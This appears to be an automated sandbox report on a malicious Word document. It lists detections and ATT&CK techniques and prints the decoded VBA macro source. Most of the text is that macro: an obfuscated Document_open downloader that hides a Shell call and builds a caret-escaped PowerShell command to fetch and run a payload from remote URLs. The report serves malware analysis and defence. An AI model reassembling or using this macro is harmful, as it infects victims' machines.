MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, which is likely used by the 'Document_open' macro to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.Valyria-6922861-0' further supports its nature as a downloader. The VBA code appears to be obfuscated, but the intent to execute external code is clear.
Heuristics 5
-
ClamAV: Doc.Downloader.Valyria-6922861-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6922861-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6841 bytes |
SHA-256: 4f72a6ca054415afb3bfaf93e2e41e056982cf634768092e3d5d0cd4c12c3ceb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ZIMUIGEpYcSzfp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Month Format("8379" + "166825450" + "f" + "nS")
Month Format("iwn" + "SOQQufkvEHHU")
Month Format("Vad" + "swX")
Month Format("BPRTWqH" + "123990321" + "61931562" + "jZRQ")
Month Format("nr" + "195608342" + "OUiLtWlQz" + "Jzzkq")
Month Format("ZZfUMkYGbI" + "wT" + "TK" + "FPaPPVmth")
Month Format("6872" + "woP" + "CVCWa" + "E")
Month Format("a" + "tW")
Month Format("acDc" + "HJJR" + "JE" + "biDpJntsuzWwj")
Month Format("99917046" + "Vt" + "5498" + "198414324")
Shell Format(fYriA) + Format(bvGWQah) + Format(DfWwcwcDPZ) + qEFDRHiTp + MFzZTB + Format(EdGfjFQlB) + Format(hbZmULGCT), Format(vbHide)
Month Format("iSIZZii" + "nc")
Month Format("351743984" + "jiOIjA")
Month Format("7045" + "9099")
End Sub
Attribute VB_Name = "diBSboziQXGmZw"
Function qEFDRHiTp()
On _
Error _
Resume _
Next
Month Format("248269970" + "40418352")
Month Format("4540" + "ulwZ")
jMovfchjU = Chr(0 + 2 + 6 + 18 + 73) + "md /" + "V^:/" + Chr(0 + 1 + 4 + 12 + 50) + Chr(0 + 0 + 2 + 5 + 27) + "^s" + "^et z^" + "q" + "^j8=" + "^ ^"
Month Format("oEnAPOPhV" + "SYw" + "jrF" + "KzZD")
Month Format("ovPz" + "6875")
GpKMajLMD = " " + "^" + " ^ " + " ^ ^ " + "^}}{^h" + Chr(0 + 2 + 6 + 18 + 73)
Month Format("jFENKmPnR" + "129350848" + "J" + "mpCYiKtqfwkIl")
sOqzwE = "ta" + Chr(0 + 2 + 6 + 18 + 73) + "^" + "};k" + "^aerb^;" + "jq^j$ " + "^me^t^" + "I-^eko" + "vnI;)" + "^jq" + "j" + "^$^" + " ^,V"
Month Format("T" + "277300603" + "QjWT" + "1384")
Month Format("sv" + "307064985")
Month Format("sBYF" + "5333" + "358040471" + "369408302")
rkSpl = "T^O^$(" + "e^l" + "iFd" + "ao^ln^w" + "^oD^." + "VR^T^" + "${^yr" + "t{)p"
Month Format("131691278" + "loAYGo" + "300464565" + "crlZwRbYOAwwv")
Month Format("6481" + "279094329" + "Gm" + "joHIS")
Month Format("426729368" + "Gj")
Month Format("wb" + "u" + "T" + "ld")
zWAPVL = "m^" + "i^$ " + "n" + "^i" + " VT^" + "O$(^h" + Chr(0 + 2 + 6 + 18 + 73) + "a" + "^e" + "r^" + "of;'^e"
Month Format("299109251" + "367796560")
Month Format("nZKljtACqzD" + "HtijDz" + "JiWC" + "316024205")
OEFGc = "x" + "^e.'" + "^" + "+FaR^" + "$+" + "^'^\^'" + "+" + Chr(0 + 2 + 6 + 18 + 73) + "i^lb" + "^up^"
Month Format("1390" + "THn" + "2648" + "518757823")
Month Format("454" + "iHswkW")
Month Format("3893" + "SdO" + "97180029" + "2395")
DRlhnPjS = ":v" + "ne$" + "^=j^" + "q^j$^;'" + "8^2" + "4^'^ ^" + "=^ " + "^FaR$^;" + ")^'@^" + "'(t" + "ilpS." + "'^6^" + "XLE^B^d"
Month Format("FG" + "U")
Month Format("PY" + "4271" + "Q" + "lzE")
Month Format("ZFBH" + "XA" + "YasPFqkqt" + "zC")
rXpCz = "^" + "b^E" + "F^" + "k/^mo" + Chr(0 + 2 + 6 + 18 + 73) + "^.s" + "e^i" + "^g" + "^ol" + "^" + "on^h" + Chr(0 + 2 + 6 + 18 + 73) + "^"
Month Format("387072345" + "siNbGUJ")
Month Format("UXsHA" + "192559679" + "nPMwW" + "wTpd")
GwWDYcp = "etna" + "vda/" + "/^:^p" + "^" + "tt^h^@"
Month Format("141478964" + "OhUOFsN")
zPoMMiP = "^g5" + "9Q" + "L" + "oG/a" + "u^" + ".m" + "^o" + Chr(0 + 2 + 6 + 18 + 73) + "^" + ".s^" + "p" + "^i^" + "h" + Chr(0 + 2 + 6 + 18 + 73) + "^"
Month Format("nn" + "XVmrjAQ")
Month Format("krNQ" + "5749" + "503198924" + "254865589")
HRwtwL = "do^o^w" + "//^:" + "p" + "^tth@" + "6Ur^g" + "rTZD/" + "^tnetn^" + "o" + Chr(0 + 2 + 6 + 18 + 73) + "^-^p^" + "w"
Month Format("Xz" + "337978206")
CICWizhj = "/ri^." + Chr(0 + 2 + 6 + 18 + 73) + "a" + "^.umhs" + "^.^udr" + Chr(0 + 2 + 6 + 18 + 73) + "//" + ":^p^" + "t" + "^t" + "h^@F^" + "D^8vH^f" + "L/^"
qEFDRHiTp = jMovfchjU + GpKMajLMD + sOqzwE + rkSpl + zWAPVL + OEFGc + DRlhnPjS + rXpCz + GwWDYcp + zPoMMiP + HRwtwL + CICWizhj
Month Format("QtzJmOm" + "QzZLi")
Month Format("166967013" + "111108699")
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.